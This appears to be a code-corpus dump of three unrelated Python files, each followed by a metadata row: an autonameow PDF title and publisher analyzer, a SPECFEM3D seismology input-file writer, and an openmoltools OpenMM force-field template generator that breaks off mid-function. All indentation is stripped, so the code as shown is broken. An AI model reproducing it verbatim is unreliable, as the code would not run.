from util.text import TextChunker
from util.text.filter import RegexLineFilter
from util.text.patternmatching import find_publisher_in_copyright_notice
# TODO: [TD0094] Search text for DOIs and query external services
# Example DOI: `10.1109/TPDS.2010.125`. Could be used to query external
# services for publication metadata, as with ISBN-numbers.
BLACKLISTED_TEXTLINES = frozenset([
'Advanced PDF Repair at http://www.datanumen.com/apdfr/',
'Brought to you by:',
'freepdf-books.com',
'Get More Refcardz! Visit refcardz.com',
'http://freepdf-books.com',
'www.itbookshub.com',
'Preface:',
'Table of Contents',
'This page intentionally left blank',
'Unknown',
'www.freepdf-books.com',
'www.allitebooks.com',
'www.it-ebooks.info',
'free ebooks wwwebook777com',
'free ebooks www.ebook777.com',
'free ebooks ==> www.ebook777.com',
'Free ebooks ==> www.ebook777.com',
])
title_filter = RegexLineFilter([
r'^\w$',
r'^[\.=-]+$',
r'.*cncmanual\.com.*',
r'matter material after the index\.? Please use the Bookmarks',
r'and Contents at a Glance links to access them\.?',
r'Contents at a Glance',
r'about the author.*',
r'about the technical reviewer.*',
r'acknowledgments.*',
r'for your convenience .* has placed some of the front',
r'.*freepdf-books\.com.*',
r'introduction.*',
r'index.?[0-9]+',
r'.*chapter ?[0-9]+.*',
r'.*www\.?ebook777\.?com.*',
], ignore_case=True)
class DocumentAnalyzer(BaseAnalyzer):
RUN_QUEUE_PRIORITY = 0.5
HANDLES_MIME_TYPES = ['application/pdf', 'text/*']
FIELD_LOOKUP = {
'title': {
'coercer': 'aw_string',
'multivalued': 'false',
'mapped_fields': [
# TODO: [TD0166] Set weights dynamically
{'WeightedMapping': {'field': 'Title', 'weight': '0.1'}},
],
'generic_field': 'title'
},
'datetime': {
'coercer': 'aw_timedate',
'multivalued': 'false',
'mapped_fields': [
{'WeightedMapping': {'field': 'DateTime', 'weight': '0.25'}},
{'WeightedMapping': {'field': 'Date', 'weight': '0.25'}},
],
'generic_field': 'date_created',
},
'publisher': {
'coercer': 'aw_string',
'multivalued': 'false',
'mapped_fields': [
{'WeightedMapping': {'field': 'Publisher', 'weight': '1'}},
],
'generic_field': 'publisher',
}
}
def __init__(self, fileobject, config, request_data_callback):
super().__init__(fileobject, config, request_data_callback)
def analyze(self):
maybe_text = self.request_any_textual_content()
if not maybe_text:
return
filtered_text = remove_blacklisted_lines(maybe_text, BLACKLISTED_TEXTLINES)
normalized_whitespace_text = collapse_whitespace(filtered_text)
# Arbitrarily search the text in chunks of 10%
text_chunks = TextChunker(
text=normalized_whitespace_text,
chunk_to_text_ratio=0.02
)
leading_text = text_chunks.leading
# TODO: Search text for datetime information.
# TODO: [incomplete] Search more than 1 line! Handle multiple matches.
text_titles = [
t for t, _ in find_titles_in_text(leading_text, num_lines_to_search=1)
]
if text_titles:
# TODO: [TD0190] Bundle single fields like this into "records".
# When attempting to find a "more likely" field value among
# multiple possible candidate values, operate on the records. This
# should help with comparing the candidate values against values
# from other sources and also with other methods that look at
# relationships between fields within a single record and also
# between multiple records.
maybe_text_title = text_titles[0]
clean_title = cleanup_full_title(maybe_text_title)
if clean_title:
self._add_intermediate_results('title', clean_title)
literal_lookup_dict = known_data_loader.literal_lookup_dict('publisher')
if literal_lookup_dict:
# TODO: Pass multiple possible publishers with probabilities.
# (publisher is not "multivalued")
result = self._search_text_for_copyright_publisher(leading_text, literal_lookup_dict)
if result:
self._add_intermediate_results('publisher', result)
else:
result = self._search_text_for_candidate_publisher(leading_text, literal_lookup_dict)
if result:
self._add_intermediate_results('publisher', result)
else:
regex_lookup_dict = known_data_loader.regex_lookup_dict('publisher')
if regex_lookup_dict:
# TODO: Pass multiple possible publishers with probabilities.
# (publisher is not "multivalued")
result = self._search_text_for_copyright_publisher(leading_text, regex_lookup_dict)
if result:
self._add_intermediate_results('publisher', result)
else:
result = self._search_text_for_candidate_publisher(leading_text, regex_lookup_dict)
if result:
self._add_intermediate_results('publisher', result)
def _search_text_for_candidate_publisher(self, text, patterns):
# TODO: [TD0130] Implement general-purpose substring matching/extraction.
result = find_publisher(text, patterns)
return result
def _search_text_for_copyright_publisher(self, text, patterns):
# TODO: [TD0130] Implement general-purpose substring matching/extraction.
possible_publishers = find_publisher_in_copyright_notice(text)
if not possible_publishers:
return None
# TODO: [cleanup] ..
result = find_publisher(possible_publishers, patterns)
return result
@classmethod
def dependencies_satisfied(cls):
return True
def find_titles_in_text(text, num_lines_to_search):
# Add all lines that aren't all whitespace or all dashes, from the
# first to line number "num_lines_to_search".
# The first line is assigned weight 1, weights decrease for
# for each line until line number "num_lines_to_search" with weight 0.1.
assert isinstance(num_lines_to_search, int) and num_lines_to_search > 0
titles = list()
line_count = 0
for line in text.splitlines():
if line_count == num_lines_to_search:
break
if not line.strip():
continue
filtered_line = title_filter(line)
if not filtered_line:
continue
score = (num_lines_to_search - line_count) / num_lines_to_search
# TODO: Set weight dynamically ..
# self._add_intermediate_results(
# 'title', self._wrap_generic_title(line, score)
# )
titles.append((filtered_line, score))
line_count += 1
return titles
def find_publisher(text, candidates):
replacement = regexbatch.find_replacement_value(candidates, text)
if replacement:
return replacement
return None
| jonasjberg/autonameow | autonameow/analyzers/analyze_document.py | Python | gpl-2.0 | 8,535 | [
"VisIt"
] | ef28f7cca77705d93e5c60fd3914cb41d454b5a565b7a383aaba665d92ec29ee |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Input file writer for SPECFEM3D_CARTESIAN with support for the CEM project.
:copyright:
Lion Krischer (krischer@geophysik.uni-muenchen.de), 2013
Emanuele Casarotti (emanuele.casarotti@ingv.it), 2013
:license:
GNU General Public License, Version 3
(http://www.gnu.org/copyleft/gpl.html)
"""
import inspect
import math
import numpy as np
import os
# Define the required configuration items. The key is always the name of the
# configuration item and the value is a tuple. The first item in the tuple is
# the function or type that it will be converted to and the second is the
# documentation.
REQUIRED_CONFIGURATION = {
"RECORD_LENGTH_IN_MINUTES": (float, "record length in minutes"),
"SIMULATION_TYPE": (
int, "forward or adjoint simulation, 1 = forward, "
"2 = adjoint, 3 = both simultaneously"),
"NCHUNKS": (int, "number of chunks (1, 2, 3, or 6)"),
# number of elements at the surface along the two sides of the first chunk
# (must be multiple of 16 and 8 * multiple of NPROC below)
"NEX_XI": (int, "number of elements at the surface along the xi side "
"of the first chunk (must be multiple of 16 and 8 * "
"multiple of NPROC_XI)."),
"NEX_ETA": (int, "number of elements at the surface along the eta side "
"of the first chunk (must be multiple of 16 and 8 * "
"multiple of NPROC_ETA)."),
# number of MPI processors along the two sides of the first chunk
"NPROC_XI": (int, "number of MPI processors along the xi side of the "
"first chunk."),
"NPROC_ETA": (int, "number of MPI processors along the eta side of the "
"first chunk."),
"MODEL": (str, "The used model. See the manual for a number of choices. "
"Use 'CEM_ACCEPT' to load a model from the CEM mesher, and "
"'CEM_REQUEST' to generate a CEM request.")
}
# The default configuration item. Contains everything that can sensibly be set
# to some default value. The syntax is very similar to the
# REQUIRED_CONFIGURATION except that the tuple now has three items, the first
# one being the actual default value.
DEFAULT_CONFIGURATION = {
"NOISE_TOMOGRAPHY":
(0, int, "flag of noise tomography, three steps (1,2,3). If "
"earthquake simulation, set it to 0."),
"SAVE_FORWARD": (False, bool, "save last frame of forward simulation or "
"not"),
"ANGULAR_WIDTH_XI_IN_DEGREES": (90.0, float, "Width of one side of the "
"chunk"),
"ANGULAR_WIDTH_ETA_IN_DEGREES": (90.0, float,
"Width of the other side of the chunk"),
"CENTER_LATITUDE_IN_DEGREES": (40.0, float, "Laitude center of chunk"),
"CENTER_LONGITUDE_IN_DEGREES": (10.0, float, "Longitude center of chunk"),
"GAMMA_ROTATION_AZIMUTH": (
20.0, float, "Defines the rotation angle of the chunk about its "
"center measured counter clockwise from due North "
"(degrees)."),
"OCEANS": (False, bool, "parameter describing the earth model."),
"ELLIPTICITY": (False, bool, "parameter describing the earth model."),
"TOPOGRAPHY": (False, bool, "parameter describing the earth model."),
"GRAVITY": (False, bool, "parameter describing the earth model."),
"ROTATION": (False, bool, "parameter describing the earth model."),
"ATTENUATION": (False, bool, "parameter describing the earth model."),
"ABSORBING_CONDITIONS": (False, bool, "absorbing boundary conditions for "
"a regional simulation"),
# to undo attenuation for sensitivity kernel calculations or forward
# runs with SAVE_FORWARD
# use one (and only one) of the two flags below. UNDO_ATTENUATION is
# much better (it is exact)
# but requires a significant amount of disk space for temporary storage.
"ATTENUATION_1D_WITH_3D_STORAGE": (True, bool, ""),
"PARTIAL_PHYS_DISPERSION_ONLY": (True, bool, ""),
"UNDO_ATTENUATION": (False, bool, ""),
"NT_DUMP_ATTENUATION": (100, int,
"how often we dump restart files to undo "
"attenuation, only needed when using "
"UNDO_ATTENUATION"),
"EXACT_MASS_MATRIX_FOR_ROTATION":
(False, bool,
"three mass matrices instead of one are needed to handle rotation "
"very accurately; otherwise rotation is handled slightly less "
"accurately (but still reasonably well); set to .true. if you are "
"interested in precise effects related to rotation; set to .false. "
"if you are solving very large inverse problems at high frequency "
"and also undoing attenuation exactly using the UNDO_ATTENUATION "
"flag above, in which case saving as much memory as possible can be "
"a good idea. You can also safely set it to .false. if you are not "
"in a period range in which rotation matters, e.g. if you are "
"targetting very short-period body waves. if in doubt, set to "
".true. Set it to .true. if you have ABSORBING_CONDITIONS above, "
"because in that case the code will use the three mass matrices "
"anyway and thus there is no additional cost. this flag is of "
"course unused if ROTATION above is set to .false."),
"USE_LDDRK": (False, bool, "this for LDDRK high-order time scheme instead "
"of Newmark"),
"INCREASE_CFL_FOR_LDDRK":
(True, bool,
"the maximum CFL of LDDRK is significantly higher than that of the "
"Newmark scheme, in a ratio that is theoretically 1.327 / 0.697 = "
"1.15 / 0.604 = 1.903 for a solid with Poisson's ratio = 0.25 and "
"for a fluid (see the manual of the 2D code, SPECFEM2D, Tables 4.1 "
"and 4.2, and that ratio does not depend on whether we are in 2D or "
"in 3D). However in practice a ratio of about 1.5 to 1.7 is often "
"safer (for instance for models with a large range of Poisson's "
"ratio values). Since the code computes the time step using the "
"Newmark scheme, for LDDRK we will simply multiply that time step "
"by this ratio when LDDRK is on and when flag "
"INCREASE_CFL_FOR_LDDRK is true."),
"RATIO_BY_WHICH_TO_INCREASE_IT": (1.5, float, ""),
"MOVIE_SURFACE": (False, bool, ""),
"MOVIE_VOLUME": (False, bool, ""),
"MOVIE_COARSE": (False, bool, "Saves movie only at corners of elements."),
"NTSTEP_BETWEEN_FRAMES": (100, int, ""),
"HDUR_MOVIE": (0.0, float, 0.0),
# save movie in volume. Will save element if center of element is in
# prescribed volume
# top/bottom: depth in KM, use MOVIE_TOP = -100 to make sure the surface
# is stored.
# west/east: longitude, degrees East [-180/180] top/bottom: latitute,
# degrees North [-90/90]
# start/stop: frames will be stored at MOVIE_START +
# i*NSTEP_BETWEEN_FRAMES, where i=(0,1,2..) and iNSTEP_BETWEEN_FRAMES <=
# MOVIE_STOP
# movie_volume_type: 1=strain, 2=time integral of strain, 3=\mu*time
# integral of strain
# type 4 saves the trace and deviatoric stress in the whole volume,
# 5=displacement, 6=velocity
"MOVIE_VOLUME_TYPE": (2, int, ""),
"MOVIE_TOP_KM": (-100.0, float, ""),
"MOVIE_BOTTOM_KM": (1000.0, float, ""),
"MOVIE_WEST_DEG": (-90.0, float, ""),
"MOVIE_EAST_DEG": (90.0, float, ""),
"MOVIE_NORTH_DEG": (90.0, float, ""),
"MOVIE_SOUTH_DEG": (-90.0, float, ""),
"MOVIE_START": (0, int, ""),
"MOVIE_STOP": (40000, int, ""),
# I/O flags.
"SAVE_MESH_FILES": (False, bool, "save mesh files to check the mesh"),
"NUMBER_OF_RUNS": (1, int, "restart files (number of runs can be 1 or "
"higher, choose 1 for no restart files)"),
"NUMBER_OF_THIS_RUN": (1, int, ""),
"LOCAL_PATH": ("./DATABASES_MPI", str,
"path to store the local database files on each node"),
"LOCAL_TMP_PATH": ("./DATABASES_MPI", str,
"temporary wavefield/kernel/movie files"),
"NTSTEP_BETWEEN_OUTPUT_INFO": (1000, int,
"interval at which we output time step "
"info and max of norm of displacement"),
"NTSTEP_BETWEEN_OUTPUT_SEISMOS": (5000000, int,
"interval in time steps for temporary "
"writing of seismograms"),
"NTSTEP_BETWEEN_READ_ADJSRC": (1000, int, ""),
"OUTPUT_SEISMOS_FORMAT": ("SAC_BINARY", str,
"Output format, possible values are 'ASCII',"
"'SAC_ALPHANUM', 'SAC_BINARY', 'ASDF'"),
"ROTATE_SEISMOGRAMS_RT": (False, bool,
"rotate seismograms to Radial-Transverse-Z or "
"use default North-East-Z reference frame"),
"WRITE_SEISMOGRAMS_BY_MASTER": (True, bool,
"decide if master process writes all the "
"seismograms or if all processes do it in "
"parallel"),
"SAVE_ALL_SEISMOS_IN_ONE_FILE": (False, bool,
"save all seismograms in one large "
"combined file instead of one file per "
"seismogram to avoid overloading shared "
"non-local file systems such as GPFS for "
"instance"),
"USE_BINARY_FOR_LARGE_FILE": (False, bool, ""),
"RECEIVERS_CAN_BE_BURIED": (True, bool, "flag to impose receivers at the "
"surface or allow them to be "
"buried"),
"PRINT_SOURCE_TIME_FUNCTION": (False, bool, "Print source time function."),
# adjoint kernel flags
"ANISOTROPIC_KL": (False, bool,
"this parameter must be set to .true. to compute "
"anisotropic kernels in crust and mantle (related to "
"the 21 Cij in geographical coordinates) default is "
".false. to compute isotropic kernels (related to "
"alpha and beta)"),
"SAVE_TRANSVERSE_KL_ONLY": (False, bool,
"output only transverse isotropic kernels "
"(alpha_v,alpha_h,beta_v,beta_h,eta,rho) "
"rather than fully anisotropic kernels when "
"ANISOTROPIC_KL above is set to .true. means "
"to save radial anisotropic kernels, i.e., "
"sensitivity kernels for beta_v, beta_h, "
"etc."),
"APPROXIMATE_HESS_KL": (False, bool,
"output approximate Hessian in crust mantle "
"region. means to save the preconditioning for "
"gradients, they are cross correlations between "
"forward and adjoint accelerations."),
"USE_FULL_TISO_MANTLE": (False, bool,
"forces transverse isotropy for all mantle "
"elements (default is to use transverse isotropy "
"only between MOHO and 220) means we allow "
"radial anisotropy between the bottom of the "
"crust to the bottom of the transition zone, "
"i.e., 660~km depth."),
"SAVE_SOURCE_MASK": (False, bool, "output kernel mask to zero out source "
"region to remove large values near "
"the sources in the sensitivity "
"kernels"),
"SAVE_REGULAR_KL": (False, bool, "output kernels on a regular grid "
"instead of on the GLL mesh points "
"(a bit expensive)"),
"GPU_MODE": (False, bool, "set to true to use GPUs"),
# Adios related settings.
"ADIOS_ENABLED": (False, bool, "set to true to use the ADIOS library for "
"I/Os"),
"ADIOS_FOR_FORWARD_ARRAYS": (True, bool, ""),
"ADIOS_FOR_MPI_ARRAYS": (True, bool, ""),
"ADIOS_FOR_ARRAYS_SOLVER": (True, bool, ""),
"ADIOS_FOR_SOLVER_MESHFILES": (True, bool, ""),
"ADIOS_FOR_AVS_DX": (True, bool, ""),
"ADIOS_FOR_KERNELS": (True, bool, ""),
"ADIOS_FOR_MODELS": (True, bool, ""),
"SOURCE_TIME_FUNCTION":
((), np.array, "If given, it will be used, otherwise it defaults to "
"a Gaussian wavelet")
}
def write(config, events, stations):
"""
Writes input files for SPECFEM3D_CARTESIAN.
Can only simulate one event at a time. If finite fault is present, an error
will be raised.
"""
# Map the output format.
possible_formats = ["ASCII", "SAC_ALPHANUM", "SAC_BINARY", "ASDF"]
f = config.OUTPUT_SEISMOS_FORMAT
if f not in possible_formats:
msg = "Format '%s' is invalid. Possible formats: %s" % (
f, ", ".join(possible_formats))
raise ValueError(msg)
config.OUTPUT_SEISMOS_ASCII_TEXT = False
config.OUTPUT_SEISMOS_SAC_ALPHANUM = False
config.OUTPUT_SEISMOS_SAC_BINARY = False
config.OUTPUT_SEISMOS_ASDF = False
if f == "ASCII":
config.OUTPUT_SEISMOS_ASCII_TEXT = True
elif f == "SAC_ALPHANUM":
config.OUTPUT_SEISMOS_SAC_ALPHANUM = True
elif f == "SAC_BINARY":
config.OUTPUT_SEISMOS_SAC_BINARY = True
elif f == "ASDF":
config.OUTPUT_SEISMOS_ASDF = True
else:
raise NotImplementedError
# Map the source time function.
output_files = {}
if len(config.SOURCE_TIME_FUNCTION):
config.EXTERNAL_SOURCE_TIME_FUNCTION = True
stf = ["%e" % _i for _i in config.SOURCE_TIME_FUNCTION]
output_files["STF"] = "\n".join(stf)
else:
config.EXTERNAL_SOURCE_TIME_FUNCTION = False
def fbool(value):
"""
Convert a value to a FORTRAN boolean representation.
"""
if value:
return ".true."
else:
return ".false."
for key, value in config.iteritems():
if isinstance(value, bool):
config[key] = fbool(value)
template_file = os.path.join(os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe()))),
"specfem_globe_cem_par_file.template")
with open(template_file, "rt") as fh:
par_file_template = fh.read()
par_file = par_file_template.format(**config)
# The template for the CMTSOLUTION file.
CMT_SOLUTION_template = (
"PDE {time_year} {time_month} {time_day} {time_hh} {time_mm} "
"{time_ss:.2f} {event_latitude:.5f} {event_longitude:.5f} "
"{event_depth:.5f} {event_mag:.1f} {event_mag:.1f} {event_name}\n"
"event name: 0000000\n"
"time shift: 0.0000\n"
"half duration: {half_duration:.4f}\n"
"latitude: {event_latitude:.5f}\n"
"longitude: {event_longitude:.5f}\n"
"depth:{event_depth: 17.5f}\n"
"Mrr: {mrr:.6g}\n"
"Mtt: {mtt:.6g}\n"
"Mpp: {mpp:.6g}\n"
"Mrt: {mrt:.6g}\n"
"Mrp: {mrp:.6g}\n"
"Mtp: {mtp:.6g}")
# Create the event file.
if len(events) != 1:
msg = ("The SPECFEM backend can currently only deal with a single "
"event.")
raise NotImplementedError(msg)
event = events[0]
# Calculate the moment magnitude
M_0 = 1.0 / math.sqrt(2.0) * math.sqrt(
event["m_rr"] ** 2 +
event["m_tt"] ** 2 +
event["m_pp"] ** 2)
magnitude = 2.0 / 3.0 * math.log10(M_0) - 6.0
lat, lng = (event["latitude"], event["longitude"])
m_rr, m_tt, m_pp, m_rt, m_rp, m_tp = (
event["m_rr"], event["m_tt"], event["m_pp"], event["m_rt"],
event["m_rp"], event["m_tp"])
CMT_SOLUTION_file = CMT_SOLUTION_template.format(
time_year=event["origin_time"].year,
time_month=event["origin_time"].month,
time_day=event["origin_time"].day,
time_hh=event["origin_time"].hour,
time_mm=event["origin_time"].minute,
time_ss=event["origin_time"].second +
event["origin_time"].microsecond / 1E6,
event_mag=magnitude,
event_name=str(event["origin_time"]) + "_" + ("%.1f" % magnitude),
event_latitude=float(lat),
event_longitude=float(lng),
event_depth=float(event["depth_in_km"]),
half_duration=0.0,
# Convert to dyne * cm.
mtt=m_tt * 1E7,
mpp=m_pp * 1E7,
mrr=m_rr * 1E7,
mtp=m_tp * 1E7,
mrt=m_rt * 1E7,
mrp=m_rp * 1E7)
station_parts = []
for station in stations:
station_parts.append(
"{station:s} {network:s} {latitude:.5f} "
"{longitude:.5f} {elev:.1f} {buried:.1f}".format(
network=station["id"].split(".")[0],
station=station["id"].split(".")[1],
latitude=station["latitude"],
longitude=station["longitude"],
elev=station["elevation_in_m"],
buried=station["local_depth_in_m"]))
# Put the files int he output directory.
output_files["Par_file"] = par_file
output_files["CMTSOLUTION"] = CMT_SOLUTION_file
output_files["STATIONS"] = "\n".join(station_parts)
return output_files | KNMI/VERCE | verce-hpc-pe/src/wfs_input_generator/backends/write_SPECFEM3D_GLOBE_CEM.py | Python | mit | 18,012 | [
"Gaussian"
] | 924deca99044b2d2c6e2a6d9101d532d95af203ac27ff6877b63abfd2e0d0e00 |
#!/usr/bin/env python
"""
OpenMM ForceField residue template generators.
"""
from __future__ import absolute_import
import numpy as np
import os, os.path, sys
from simtk.openmm.app import ForceField
from openmoltools.amber import run_antechamber
from openmoltools.openeye import get_charges
from simtk.openmm.app.element import Element
import parmed
if sys.version_info >= (3, 0):
from io import StringIO
from subprocess import getstatusoutput
else:
from cStringIO import StringIO
from commands import getstatusoutput
def generateTopologyFromOEMol(molecule):
"""
Generate an OpenMM Topology object from an OEMol molecule.
Parameters
----------
molecule : openeye.oechem.OEMol
The molecule from which a Topology object is to be generated.
Returns
-------
topology : simtk.openmm.app.Topology
The Topology object generated from `molecule`.
"""
# Create a Topology object with one Chain and one Residue.
from simtk.openmm.app import Topology
topology = Topology()
chain = topology.addChain()
resname = molecule.GetTitle()
residue = topology.addResidue(resname, chain)
# Create atoms in the residue.
for atom in molecule.GetAtoms():
name = atom.GetName()
element = Element.getByAtomicNumber(atom.GetAtomicNum())
atom = topology.addAtom(name, element, residue)
# Create bonds.
atoms = { atom.name : atom for atom in topology.atoms() }
for bond in molecule.GetBonds():
topology.addBond(atoms[bond.GetBgn().GetName()], atoms[bond.GetEnd().GetName()])
return topology
def _ensureUniqueAtomNames(molecule):
"""
Ensure all atom names are unique and not blank.
If any atom names are degenerate or blank, Tripos atom names are assigned to all atoms.
Parameters
----------
molecule : openeye.oechem.OEMol
The molecule to be modified
"""
from openeye import oechem
atom_names = set()
atom_names_are_unique = True
for atom in molecule.GetAtoms():
atom_name = atom.GetName()
if (atom_name in atom_names) or (atom_name == ""):
atom_names_are_unique = False
atom_names.add(atom_name)
if not atom_names_are_unique:
oechem.OETriposAtomNames(molecule)
def generateOEMolFromTopologyResidue(residue, geometry=False, tripos_atom_names=False):
"""
Generate an OpenEye OEMol molecule from an OpenMM Topology Residue.
Parameters
----------
residue : simtk.openmm.app.topology.Residue
The topology Residue from which an OEMol is to be created.
An Exception will be thrown if this residue has external bonds.
geometry : bool, optional, default=False
If True, will generate a single configuration with OEOmega.
Note that stereochemistry will be *random*.
tripos_atom_names : bool, optional, default=False
If True, will generate and assign Tripos atom names.
Returns
-------
molecule : openeye.oechem.OEMol
The OEMol molecule corresponding to the topology.
Atom order will be preserved and bond orders assigned.
The Antechamber `bondtype` program will be used to assign bond orders, and these
will be converted back into OEMol bond type assignments.
Note that there is no way to preserve stereochemistry since `Residue` does
not note stereochemistry in any way.
"""
# Raise an Exception if this residue has external bonds.
if len(list(residue.external_bonds())) > 0:
raise Exception("Cannot generate an OEMol from residue '%s' because it has external bonds." % residue.name)
from openeye import oechem
# Create OEMol where all atoms have bond order 1.
molecule = oechem.OEMol()
molecule.SetTitle(residue.name) # name molecule after first residue
for atom in residue.atoms():
oeatom = molecule.NewAtom(atom.element.atomic_number)
oeatom.SetName(atom.name)
oeatom.AddData("topology_index", atom.index)
oeatoms = { oeatom.GetName() : oeatom for oeatom in molecule.GetAtoms() }
for (atom1, atom2) in residue.bonds():
order = 1
molecule.NewBond(oeatoms[atom1.name], oeatoms[atom2.name], order)
# Write out a mol2 file without altering molecule.
import tempfile
tmpdir = tempfile.mkdtemp()
mol2_input_filename = os.path.join(tmpdir,'molecule-before-bond-perception.mol2')
ac_output_filename = os.path.join(tmpdir,'molecule-after-bond-perception.ac')
ofs = oechem.oemolostream(mol2_input_filename)
m2h = True
substruct = False
oechem.OEWriteMol2File(ofs, molecule, m2h, substruct)
ofs.close()
# Run Antechamber bondtype
import subprocess
#command = 'bondtype -i %s -o %s -f mol2 -j full' % (mol2_input_filename, ac_output_filename)
command = 'antechamber -i %s -fi mol2 -o %s -fo ac -j 2' % (mol2_input_filename, ac_output_filename)
[status, output] = getstatusoutput(command)
# Define mapping from GAFF bond orders to OpenEye bond orders.
order_map = { 1 : 1, 2 : 2, 3: 3, 7 : 1, 8: 2, 9 : 5, 10 : 5 }
# Read bonds.
infile = open(ac_output_filename)
lines = infile.readlines()
infile.close()
antechamber_bond_types = list()
for line in lines:
elements = line.split()
if elements[0] == 'BOND':
antechamber_bond_types.append(int(elements[4]))
for (bond, antechamber_bond_type) in zip(molecule.GetBonds(), antechamber_bond_types):
bond.SetOrder(order_map[antechamber_bond_type])
# Clean up.
os.unlink(mol2_input_filename)
os.unlink(ac_output_filename)
os.rmdir(tmpdir)
# Set aromaticity.
# TODO: Is this necessary?
oechem.OEClearAromaticFlags(molecule)
oechem.OEAssignAromaticFlags(molecule, oechem.OEAroModelOpenEye)
# Generate Tripos atom names if requested.
if tripos_atom_names:
oechem.OETriposAtomNames(molecule)
# Assign geometry
if geometry:
from openeye import oeomega
omega = oeomega.OEOmega()
omega.SetMaxConfs(1)
omega.SetIncludeInput(False)
omega.SetStrictStereo(False)
omega(molecule)
return molecule
def _computeNetCharge(molecule):
"""
Compute the net formal charge on the molecule.
Formal charges are assigned by this function.
Parameters
----------
molecule : openeye.oechem.OEMol
The molecule for which a net formal charge is to be computed
Returns
-------
net_charge : float
The net formal charge on the molecule
"""
from openeye import oechem
oechem.OEAssignFormalCharges(molecule)
charges = [ atom.GetFormalCharge() for atom in molecule.GetAtoms() ]
net_charge = np.array(charges).sum()
return net_charge
def _writeMolecule(molecule, output_filename):
"""
Write the molecule to a file.
Parameters
----------
molecule : openeye.oechem.OEMol
The molecule to write (will be modified by writer).
output_filename : str
The filename of file to be written; type is autodetected by extension.
"""
from openmoltools.openeye import molecule_to_mol2
molecule_to_mol2(molecule, tripos_mol2_filename=output_filename, conformer=0, residue_name=molecule.GetTitle())
#from openeye import oechem
#ofs = oechem.oemolostream(output_filename)
#oechem.OEWriteMolecule(ofs, molecule)
#ofs.close()
def generateResidueTemplate(molecule, residue_atoms=None):
"""
Generate an residue template for simtk.openmm.app.ForceField using GAFF/AM1-BCC.
This requires the OpenEye toolkit.
Parameters
----------
molecule : openeye.oechem.OEMol
The molecule to be parameterized.
The molecule must have explicit hydrogens.
Net charge will be inferred from the net formal charge on each molecule.
Partial charges will be determined automatically using oequacpac and canonical AM1-BCC charging rules.
residue_atomset : set of OEAtom, optional, default=None
If not None, only the atoms in this set will be used to construct the residue template
Returns
-------
template : simtk.openmm.app.forcefield._TemplateData
Residue template for ForceField using atom types and parameters from `gaff.xml`.
additional_parameters_ffxml : str
Contents of ForceField `ffxml` file defining additional parameters from parmchk(2).
Notes
-----
The residue template will be named after the molecule title.
This method preserves stereochemistry during AM1-BCC charge parameterization.
Atom names in molecules will be assigned Tripos atom names if any are blank or not unique.
"""
# Set the template name based on the molecule title.
template_name = molecule.GetTitle()
# If any atom names are not unique, atom names
_ensureUniqueAtomNames(molecule)
# Compute net formal charge.
net_charge = _computeNetCharge(molecule)
# Generate canonical AM1-BCC charges and a reference conformation.
molecule = get_charges(molecule, strictStereo=False, keep_confs=1)
# DEBUG: This may be necessary.
molecule.SetTitle('MOL')
# Create temporary directory for running antechamber.
import tempfile
tmpdir = tempfile.mkdtemp()
prefix = 'molecule'
input_mol2_filename = os.path.join(tmpdir, prefix + '.tripos.mol2')
gaff_mol2_filename = os.path.join(tmpdir, prefix + '.gaff.mol2')
frcmod_filename = os.path.join(tmpdir, prefix + '.frcmod')
# Write Tripos mol2 file as antechamber input.
_writeMolecule(molecule, input_mol2_filename)
# Parameterize the molecule with antechamber.
run_antechamber(template_name, input_mol2_filename, charge_method=None, net_charge=net_charge, gaff_mol2_filename=gaff_mol2_filename, frcmod_filename=frcmod_filename)
# Read the resulting GAFF mol2 file as a ParmEd structure.
from openeye import oechem
ifs = oechem.oemolistream(gaff_mol2_filename)
ifs.SetFlavor(oechem.OEFormat_MOL2, oechem.OEIFlavor_MOL2_DEFAULT | oechem.OEIFlavor_MOL2_M2H | oechem.OEIFlavor_MOL2_Forcefield)
m2h = True
oechem.OEReadMolecule(ifs, molecule)
ifs.close()
# If residue_atoms = None, add all atoms to the residues
if residue_atoms == None:
residue_atoms = [ atom for atom in molecule.GetAtoms() ]
# Modify partial charges so that charge on residue atoms is integral.
residue_charge = 0.0
sum_of_absolute_charge = 0.0
for atom in residue_atoms:
charge = atom.GetPartialCharge()
residue_charge += charge
sum_of_absolute_charge += abs(charge)
excess_charge = residue_charge - net_charge
if sum_of_absolute_charge == 0.0:
sum_of_absolute_charge = 1.0
for atom in residue_atoms:
charge = atom.GetPartialCharge()
atom.SetPartialCharge( charge + excess_charge * (abs(charge) / sum_of_absolute_charge) )
# Create residue template.
template = ForceField._TemplateData(template_name)
for (index, atom) in enumerate(molecule.GetAtoms()):
atomname = atom.GetName()
typename = atom.GetType()
element = Element.getByAtomicNumber(atom.GetAtomicNum())
charge = atom.GetPartialCharge()
parameters = { 'charge' : charge }
atom_template = ForceField._TemplateAtomData(atomname, typename, element, parameters)
template.atoms.append(atom_template)
for bond in molecule.GetBonds():
if (bond.GetBgn() in residue_atoms) and (bond.GetEnd() in residue_atoms):
template.addBondByName(bond.GetBgn().GetName(), bond.GetEnd().GetName())
elif (bond.GetBgn() in residue_atoms) and (bond.GetEnd() not in residue_atoms):
template.addExternalBondByName(bond.GetBgn().GetName())
elif (bond.GetBgn() not in residue_atoms) and (bond.GetEnd() in residue_atoms):
template.addExternalBondByName(bond.GetEnd().GetName())
# Generate ffxml file contents for parmchk-generated frcmod output.
leaprc = StringIO('parm = loadamberparams %s' % frcmod_filename)
params = parmed.amber.AmberParameterSet.from_leaprc(leaprc)
params = parmed.openmm.OpenMMParameterSet.from_parameterset(params)
ffxml = StringIO()
params.write(ffxml)
return template, ffxml.getvalue()
def generateForceFieldFromMolecules(molecules):
"""
Generate ffxml file containing additional parameters and residue templates for simtk.openmm.app.ForceField using GAFF/AM1-BCC.
This requires the OpenEye toolkit.
Parameters
----------
molecules : list of openeye.oechem.OEMol
The molecules to be parameterized.
All molecules must have explicit hydrogens.
Net charge will be inferred from the net formal charge on each molecule.
Partial charges will be determined automatically using oequacpac and canonical AM1-BCC charging rules.
Returns
-------
ffxml : str
Contents of ForceField `ffxml` file defining additional parameters from parmchk(2) and residue templates.
Notes
-----
This method preserves stereochemistry during AM1-BCC charge parameterization.
Residue template names will be set from molecule names.
Atom names in molecules will be assigned Tripos atom names if any are blank or not unique.
"""
# Check template names are unique.
template_names = set()
for molecule in molecules:
template_name = molecule.GetTitle()
if template_name == '<0>':
raise Exception("Molecule '%s' has invalid name" % template_name)
if template_name in template_names:
raise Exception("Molecule '%s' has template name collision." % template_name)
